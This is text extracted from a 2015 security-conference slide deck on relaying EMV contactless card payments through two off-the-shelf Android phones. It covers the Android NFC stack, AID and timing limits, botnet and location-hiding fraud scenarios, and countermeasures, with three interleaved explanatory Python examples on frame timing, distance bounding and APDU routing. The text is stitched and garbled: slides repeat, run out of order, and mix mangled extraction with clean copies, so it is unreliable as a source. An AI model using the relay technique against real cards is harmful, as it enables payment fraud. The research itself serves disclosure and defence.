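A terminal that refuses S(WTX) and is handed a card with a small FWI gets a real timing budget; a terminal that honours extensions has a budget of minutes, which is the deck's point that timing constraints are not enforced in practice.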



Relay Attack Implementation (I): Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support
Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices
One constraint only: the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II): Threat Scenarios: Scenario 1

Distributed Mafia Fraud
[Figure: a BOTMASTER controlling several BOT devices]

Relay Attack Implementation (III): Threat Scenarios: Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV): Resistant Mechanisms

Brief summary of resistant mechanisms
Distance-bounding protocols: upper bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
Timing constraints: not enforced in current NFC-capable systems; the protocol itself allows timing extension commands
Physical countermeasures:
  Whitelisting/Blacklisting: random UID in HCE mode → unfeasible
  RFID-blocking covers
  Physical button/switch activation
  Secondary authentication methods (e.g. on-card fingerprint scanners)
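A simulation of the distance-bounding idea above (the RTT of challenge-response bits upper-bounds the distance), as an added example that is not part of the deck or its app: a Hancke-Kuhn style rapid bit exchange driven by a simulated clock, in which a relayed card answers correctly but too late, and a card holding the wrong key answers on time but wrongly. The shared key, nonce, distances and the 20 ms relay latency are constructed, and the per-round processing allowance is an assumption.

```python
"""Distance-bounding check: upper-bounding physical distance with the round-trip
time (RTT) of cryptographic challenge-response bits.

Added example, not code from the HITB'15 deck or its relay app.  Both parties
derive two response registers from a shared key and the verifier's nonce before
the timed phase, so each timed round is only a one-bit lookup.  The verifier
rejects a prover whose replies are wrong OR whose RTT exceeds what the maximum
allowed distance permits.  Time is simulated, not measured on real hardware.
"""
import hashlib
import hmac
import random
from dataclasses import dataclass
from typing import Dict, List, Tuple

C_M_PER_S = 299_792_458.0   # nothing travels faster than this, so RTT bounds distance


def derive_registers(key: bytes, nonce: bytes, n_rounds: int) -> Tuple[List[int], List[int]]:
    """Two n_rounds-bit registers R0 and R1 from HMAC-SHA256(key, nonce)."""
    if n_rounds > 128:
        raise ValueError("one SHA-256 digest yields at most 128 rounds")
    digest = hmac.new(key, nonce, hashlib.sha256).digest()
    bits = [(byte >> i) & 1 for byte in digest for i in range(8)]
    return bits[:n_rounds], bits[n_rounds:2 * n_rounds]


@dataclass
class SimulatedProver:
    key: bytes                    # key this prover actually holds (may be wrong)
    distance_m: float             # physical distance to the verifier's antenna
    relay_latency_s: float = 0.0  # extra delay of a relay channel; 0 for a card in the field
    proc_delay_s: float = 50e-9   # assumed time to select one register bit

    def respond(self, nonce: bytes, n_rounds: int, i: int, challenge: int) -> Tuple[int, float]:
        """Answer challenge bit i and report the simulated RTT the verifier observes."""
        r0, r1 = derive_registers(self.key, nonce, n_rounds)
        answer = r1[i] if challenge else r0[i]
        rtt = 2 * self.distance_m / C_M_PER_S + self.proc_delay_s + self.relay_latency_s
        return answer, rtt


def verify(prover: SimulatedProver, key: bytes, d_max_m: float, n_rounds: int = 32,
           proc_allowance_s: float = 100e-9, seed: int = 1) -> Dict[str, object]:
    """Verifier side: accept only if every reply is correct AND arrives within
    t_max = 2 * d_max / c + the processing time the verifier is willing to allow."""
    rng = random.Random(seed)   # seeded only so the demo is reproducible
    nonce = rng.getrandbits(128).to_bytes(16, "big")
    r0, r1 = derive_registers(key, nonce, n_rounds)
    t_max = 2 * d_max_m / C_M_PER_S + proc_allowance_s
    wrong, late = 0, 0
    for i in range(n_rounds):
        challenge = rng.getrandbits(1)
        answer, rtt = prover.respond(nonce, n_rounds, i, challenge)
        if answer != (r1[i] if challenge else r0[i]):
            wrong += 1
        if rtt > t_max:
            late += 1
    return {"accepted": wrong == 0 and late == 0, "wrong": wrong, "late": late, "t_max_s": t_max}


def demo() -> Dict[str, bool]:
    """Three constructed provers against a 10 cm bound: genuine card in the field,
    the same card behind a 20 ms relay hop, and a card with the wrong key."""
    key = bytes.fromhex("000102030405060708090a0b0c0d0e0f")   # constructed shared key
    near = SimulatedProver(key, distance_m=0.04)
    relayed = SimulatedProver(key, distance_m=0.04, relay_latency_s=0.020)
    impostor = SimulatedProver(bytes(16), distance_m=0.04)
    return {name: verify(p, key, d_max_m=0.10)["accepted"]
            for name, p in (("near", near), ("relayed", relayed), ("impostor", impostor))}


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:9s} accepted={ok}")
```

Note that t_max for a 10 cm bound is only about 100 ns, dominated by the processing allowance, which is why real distance-bounding needs dedicated fast hardware rather than the APDU-level timing an OTS Android device can offer.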


Related Work: On relay attacks

2005-2009: First works, built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012-2013: Relay attacks on Android accessing Secure Elements. An SE securely stores data associated with credit/debit cards. Needs a non-OTS Android device
2014: Active relay attacks with custom hardware and custom Android firmware
Several works studied the delay of the relay channel
Relay over long distances is feasible → latency isn't a hard constraint
Ask us for specific references, too many names for a single slide


Conclusions (I)

Security of NFC is based on the physical proximity concern
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are rising
  Abuse to interact with cards in their proximity
Conclusions:
  Review of the Android NFC stack
  Proof-of-Concept of relay attacks using Android OTS devices
  Threat scenarios introduced
  Virtual pickpocketing attack may appear before long


Conclusions (II): But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
  Develop a botnet infrastructure and earn money
  Timing constraints of Android HCE mode
  Try active relay attacks within EMV contactless cards
Acknowledgments
  Spanish National Cybersecurity Institute (INCIBE)
  University of León under contract X43
  HITB staff
And thanks to all for hearing us
Visit http://vwzq.net/relaynfc for more info about the project



Introduction to NFC (VIII)

NFC brings "cards" to mobile devices
The payment sector is quite interested in this new way of making payments
500M NFC payment users expected by 2019
Almost 300 smartphones available at the moment with NFC capabilities
  Check http://www.nfcworld.com/nfc-phones-list
Most of them run Android OS

Research Hypothesis
Can a passive relay attack be performed in contactless payment cards using an Android NFC-capable device?
If so, what are the constraints (if any exist)?

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay

Are they secure

Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100

cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)

Sequential contactless payments limited ndash it asks for the PIN

Protected by the same fraud guarantee as standard transactions(hopefully)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperate

Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

Android and NFC: A Tale of L♥ve (V)
Some remarkable limitations and remarks

Limitation 3: dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16/fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding remarks
Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
Any communication involving an APDU-compliant NFC tag (i.e., MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice

J. Vila, R. J. Rodríguez. Relay Attacks in EMV Contactless Cards with Android OTS Devices. HITB'15 AMS, slide 24/36

Agenda

1. Introduction
2. Background: EMV Contactless Cards; Relay Attacks and Mafia Frauds
3. Android and NFC: A Tale of L♥ve: Evolution of NFC Support in Android; Practical Implementation Alternatives in Android
4. Relay Attack Implementation: Demo experiment; Threat Scenarios; Resistant Mechanisms
5. Related Work
6. Conclusions

Relay Attack Implementation (I)
Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support
Android app developed (±2000 LOC)
Two OTS Android NFC-capable devices
One constraint only: the dishonest prover must run Android ≥ 4.4

Relay Attack Implementation (II)
Threat Scenarios – Scenario 1: Distributed Mafia Fraud

[Figure: a BOTMASTER controlling several BOTs]

Relay Attack Implementation (III)
Threat Scenarios – Scenario 2: Hiding Fraud Locations

Relay Attack Implementation (IV)
Resistant Mechanisms

Brief summary of resistant mechanisms:
Distance-bounding protocols: upper bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
Timing constraints: not enforced in current NFC-capable systems; the protocol itself allows timing extension commands
Physical countermeasures: whitelisting/blacklisting (random UID in HCE mode → unfeasible); RFID blocking covers; physical button/switch activation; secondary authentication methods (e.g., on-card fingerprint scanners)
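To make the timing numbers from the Limitation 3 slide and the distance-bounding and timing-constraint countermeasures listed above concrete, here is an added Python example; it is not code from the slides or from the authors' relay app. It implements the ISO/IEC 14443-4 FWT formula as quoted on the slide, the S(WTX) waiting-time extension the "timing extension commands" remark refers to (WTXM ranges over 1..59 in ISO/IEC 14443-4), the check a reader would apply if it enforced frame timing against a relay delay, and the speed-of-light bound a distance-bounding protocol derives from the round-trip time of a challenge-response. The relay delay, FWI and RTT values used in the demo are constructed, not measurements from the talk.

```python
"""Frame Waiting Time and distance-bounding arithmetic (added example)."""
from dataclasses import dataclass
from typing import List, Tuple

FC_HZ = 13.56e6                 # ISO/IEC 14443 carrier frequency fc
FWI_MAX = 14                    # ISO/IEC 14443-4: 0 <= FWI <= 14
WTXM_MIN, WTXM_MAX = 1, 59      # S(WTX) multiplier range, ISO/IEC 14443-4
SPEED_OF_LIGHT_M_S = 299_792_458.0


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2**FWI: the Frame Waiting Time the card announces
    in its ATS; the reader waits at most this long for each response."""
    if not 0 <= fwi <= FWI_MAX:
        raise ValueError("FWI must be in [0, 14]")
    return 256 * (16 / FC_HZ) * (2 ** fwi)


def fwt_table() -> List[Tuple[int, float]]:
    """FWT for every legal FWI: the first entry is ~302 us and the last ~4.95 s,
    which is where the slide's [500 us, 5 s] envelope comes from."""
    return [(fwi, fwt_seconds(fwi)) for fwi in range(FWI_MAX + 1)]


def fwt_temp_seconds(fwi: int, wtxm: int) -> float:
    """Temporary FWT after an S(WTX) request: the card side may ask the reader to
    wait FWT * WTXM. This is the timing extension that makes protocol-level
    timing alone a weak relay countermeasure."""
    if not WTXM_MIN <= wtxm <= WTXM_MAX:
        raise ValueError("WTXM must be in [1, 59]")
    return fwt_seconds(fwi) * wtxm


def relay_tolerated_by_fwt(fwi: int, relay_delay_s: float, wtxm: int = 1) -> bool:
    """Would a reader that only enforces FWT notice a passive relay adding
    relay_delay_s to every card response? Only when the added delay exceeds
    the (possibly extended) waiting time."""
    return relay_delay_s <= fwt_temp_seconds(fwi, wtxm)


@dataclass(frozen=True)
class DistanceBoundResult:
    upper_bound_m: float
    accepted: bool


def distance_bound(rtt_s: float, processing_s: float, max_distance_m: float) -> DistanceBoundResult:
    """Distance-bounding estimate: after subtracting the prover's known
    processing time, challenge and response together travelled at most
    c * (rtt - processing) metres, so the prover is at most half that away.
    Accept only when that bound lies within the allowed distance."""
    if rtt_s < processing_s:
        raise ValueError("round-trip time cannot be shorter than processing time")
    upper = SPEED_OF_LIGHT_M_S * (rtt_s - processing_s) / 2
    return DistanceBoundResult(upper, upper <= max_distance_m)


if __name__ == "__main__":
    for fwi, fwt in fwt_table():
        print(f"FWI={fwi:2d}  FWT={fwt * 1e3:10.3f} ms")
    # Constructed relay delay: 300 ms over a mobile data link between two phones.
    RELAY_DELAY_S = 0.300
    print("FWI=8, plain FWT :", relay_tolerated_by_fwt(8, RELAY_DELAY_S))       # False
    print("FWI=8, WTXM=10   :", relay_tolerated_by_fwt(8, RELAY_DELAY_S, 10))   # True
    print("FWI=14           :", relay_tolerated_by_fwt(14, RELAY_DELAY_S))      # True
    # Constructed round-trip times for one rapid-bit-exchange round: 50 ns vs 1 us.
    print(distance_bound(50e-9, 0.0, 10.0))   # bound ~7.5 m, accepted
    print(distance_bound(1e-6, 0.0, 10.0))    # bound ~150 m, rejected
```

The point of the two halves: FWT (even without WTX) leaves room for hundreds of milliseconds of relay latency at the larger FWI values, whereas a distance bound computed from the speed of light rejects anything beyond a few metres once the round trip is longer than a few tens of nanoseconds, which is why the slide lists distance bounding, not frame timing, as the real countermeasure.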


Related Work
On relay attacks

2005–2009: first works built on specific hardware
2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
2012–2013: relay attacks on Android accessing Secure Elements. A SE securely stores data associated with credit/debit cards. Needs a non-OTS Android device
2014: active relay attacks with custom hardware and custom Android firmware
Several works studied the delay on the relay channel
Relay over long distances is feasible → latency isn't a hard constraint
Ask us for specific references, too many names for a single slide


Conclusions (I)

Security of NFC relies on the physical proximity assumption
NFC threats: eavesdropping, data modification, relay attacks
Android NFC-capable devices are on the rise: they can be abused to interact with cards in their proximity

Conclusions
Review of the Android NFC stack
Proof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attacks may appear before long

Conclusions (II)
But then, what the hell can I do? Should I run away?

Conclusions (III)

Future Work
Develop a botnet infrastructure and earn money
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards

Acknowledgments
Spanish National Cybersecurity Institute (INCIBE)
University of León under contract X43
HITB staff

And thanks to all of you for listening to us
Visit http://vwzq.net/relaynfc for more info about the project



Background (I)
EMV contactless cards

Europay, Mastercard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactions
Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)
Application ID (AID) command

Background (II)
MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?
Amount limit on a single transaction: up to £20 GBP, 20 €, US$50, 50 CHF, CAD$100 or AUD$100
(cough, cough) (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)
Sequential contactless payments limited – it asks for the PIN
Protected by the same fraud guarantee as standard transactions (hopefully)

Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)
Mafia frauds – Y. Desmedt (SecuriCom'88)

[Figure: the honest prover P talks to the dishonest verifier, which forwards over a communication link to the dishonest prover, which in turn talks to the honest verifier V]

Real-time fraud where a fraudulent prover and a fraudulent verifier cooperate
Honest prover and verifier: contactless card and Point-of-Sale terminal
Dishonest prover and verifier: two NFC-enabled Android devices


Android and NFC: A Tale of L♥ve (I)
Recap on evolution of Android NFC support

[Figure: timeline of NFC operation modes supported (Reader/Writer, Peer-to-peer, hardware Card-emulation, software Card-emulation) and tag technology classes per Android release]
Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), NfcF (JIS 6319-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B), thanks to Doug Yeager
Android 4.2 Jelly Bean (API level 17): NfcBarcode
Android 4.4 KitKat (API level 19): NfcAdapter.ReaderCallback added, software Card-emulation

Android and NFC: A Tale of L♥ve (II)
Digging into Android NFC stack

Event-driven framework, nice API support
Two native implementations (depending on the built-in NFC chip): libnfc-nxp and libnfc-nci
NXP dropped in favour of NCI: open architecture not focused on a single chip family; open interface between the NFC Controller and the DH (Device Host); standard proposed by the NFC Forum

Android and NFC: A Tale of L♥ve (III)
Digging into Android NFC stack – Reader/Writer mode

Not allowed to be set directly → Android activity
The Android NFC service selects apps according to the tag definition in the Manifest file
At low level, libnfc-nci uses a reliable mechanism of queues and message passing – General Kernel Interface (GKI); it makes communication between layers and modules easier

[Figure: call path of a transceive. User App → NFC developer framework (Tag, NfcService, mTagService.transceive) → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive → System NFC Library (NativeNfcTag.cpp, libnfc-nci)]

Android and NFC: A Tale of L♥ve (IV)
Digging into Android NFC stack – HCE mode

A service must be implemented to process commands and replies: HostApduService abstract class and processCommandApdu method
AID-based routing service table: this means you need to declare in advance what AID you handle
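The Background (I) slide names the ISO/IEC 7816-4 command set and the AID, and the HCE slide above explains that Android routes APDUs to a service by an AID declared in advance. The following added Python example (not code from the slides or from the authors' app) decodes a short-form command APDU, builds the explicit SELECT-by-AID that a terminal sends, and runs both through a toy routing table with the same declare-in-advance property, which is exactly why the "AID must be known in advance" limitation later in the deck exists. All AIDs in it are constructed placeholders, not real payment AIDs, and the routing class is this example's own simplification, not Android's implementation.

```python
"""ISO/IEC 7816-4 command APDU decoding and AID-based routing (added example)."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

INS_SELECT = 0xA4
P1_SELECT_BY_DF_NAME = 0x04            # SELECT by AID (DF name)
SW_OK = b"\x90\x00"
SW_FILE_NOT_FOUND = b"\x6A\x82"        # no application with that AID
SW_CONDITIONS_NOT_SATISFIED = b"\x69\x85"


@dataclass(frozen=True)
class CommandApdu:
    cla: int
    ins: int
    p1: int
    p2: int
    data: bytes
    le: Optional[int]   # None when absent; a short-form Le of 0x00 means 256


def parse_command_apdu(raw: bytes) -> CommandApdu:
    """Decode a short-form C-APDU: CLA INS P1 P2 [Lc data] [Le] (cases 1 to 4)."""
    if len(raw) < 4:
        raise ValueError("APDU shorter than the 4-byte header")
    cla, ins, p1, p2 = raw[0], raw[1], raw[2], raw[3]
    body = raw[4:]
    if not body:                                   # case 1: header only
        return CommandApdu(cla, ins, p1, p2, b"", None)
    if len(body) == 1:                             # case 2: Le only
        return CommandApdu(cla, ins, p1, p2, b"", body[0] or 256)
    lc = body[0]
    data = body[1:1 + lc]
    if len(data) != lc:
        raise ValueError("Lc does not match the data length")
    tail = body[1 + lc:]
    if len(tail) == 0:                             # case 3: data, no Le
        le = None
    elif len(tail) == 1:                           # case 4: data and Le
        le = tail[0] or 256
    else:
        raise ValueError("unexpected bytes after Le")
    return CommandApdu(cla, ins, p1, p2, data, le)


def build_select_by_aid(aid: bytes) -> bytes:
    """The explicit SELECT (CLA=00 INS=A4 P1=04 P2=00 Lc AID Le=00) a terminal
    sends to pick an application; AID routing keys on this APDU."""
    if not 5 <= len(aid) <= 16:                    # RID (5 bytes) plus up to 11 bytes of PIX
        raise ValueError("AID length must be 5..16 bytes")
    return bytes([0x00, INS_SELECT, P1_SELECT_BY_DF_NAME, 0x00, len(aid)]) + aid + b"\x00"


def is_select_by_aid(apdu: CommandApdu) -> bool:
    return apdu.ins == INS_SELECT and apdu.p1 == P1_SELECT_BY_DF_NAME


class AidRouter:
    """Toy AID routing table with the property the slide describes: a service
    only receives APDUs after a SELECT of an AID it registered beforehand."""

    def __init__(self) -> None:
        self._table: Dict[bytes, str] = {}
        self._selected: Optional[str] = None

    def register(self, aid: bytes, service: str) -> None:
        self._table[bytes(aid)] = service

    def route(self, raw: bytes) -> Tuple[Optional[str], bytes]:
        """Return (service that would handle this APDU, status word)."""
        apdu = parse_command_apdu(raw)
        if is_select_by_aid(apdu):
            self._selected = self._table.get(apdu.data)
            return (self._selected, SW_OK if self._selected else SW_FILE_NOT_FOUND)
        if self._selected is None:                 # nothing selected yet: no service gets it
            return (None, SW_CONDITIONS_NOT_SATISFIED)
        return (self._selected, SW_OK)


if __name__ == "__main__":
    # Constructed placeholder AIDs; the slides show no real payment AIDs.
    known_aid = bytes.fromhex("A0000000011122")
    unknown_aid = bytes.fromhex("A0000000019999")
    router = AidRouter()
    router.register(known_aid, "DemoHostApduService")
    print(router.route(build_select_by_aid(unknown_aid)))   # (None, b'j\x82')
    print(router.route(build_select_by_aid(known_aid)))     # ('DemoHostApduService', b'\x90\x00')
    print(router.route(bytes.fromhex("00B2010C00")))        # READ RECORD goes to the selected service
```

Running it shows the two outcomes a defender cares about: a SELECT for an AID nobody registered is answered with 6A82 and reaches no service at all, and a non-SELECT command is only delivered once a registered AID has been selected.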

Android and NFC: A Tale of L♥ve (V)
Digging into Android NFC stack – Summary

Description                                        | Language(s) | Dependency                | OSS
NFC developer framework (com.android.nfc package)  | Java, C++   | API level                 | Yes
System NFC library (libnfc-nxp or libnfc-nci)      | C/C++       | Manufacturer              | Yes
NFC Android kernel driver                          | C           | Hardware and manufacturer | Yes
NFC firmware (/system/vendor/firmware directory)   | ARM Thumb   | Hardware and manufacturer | No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
